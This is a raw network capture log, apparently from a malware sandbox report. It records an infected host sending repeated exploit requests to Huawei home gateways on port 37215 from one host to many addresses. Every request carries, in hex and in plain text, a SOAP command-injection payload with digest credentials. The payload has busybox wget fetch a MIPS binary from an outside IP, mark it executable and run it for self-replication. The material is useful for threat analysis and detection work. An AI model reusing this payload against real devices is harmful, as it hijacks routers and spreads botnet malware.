6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  392192.168.2.1346822197.204.28.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272350073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  393192.168.2.1338174157.237.98.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272371054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  394192.168.2.134013441.194.218.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272391081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  395192.168.2.13428641.157.157.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272407055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  396192.168.2.133996041.184.103.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272425890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  397192.168.2.1349208157.243.7.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272447109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  398192.168.2.135361641.3.176.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272463083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  399192.168.2.134159641.102.239.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272600889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  400192.168.2.1351686197.176.17.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272634029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  401192.168.2.133988473.55.154.24837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276494980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  402192.168.2.1351722223.18.209.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276508093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
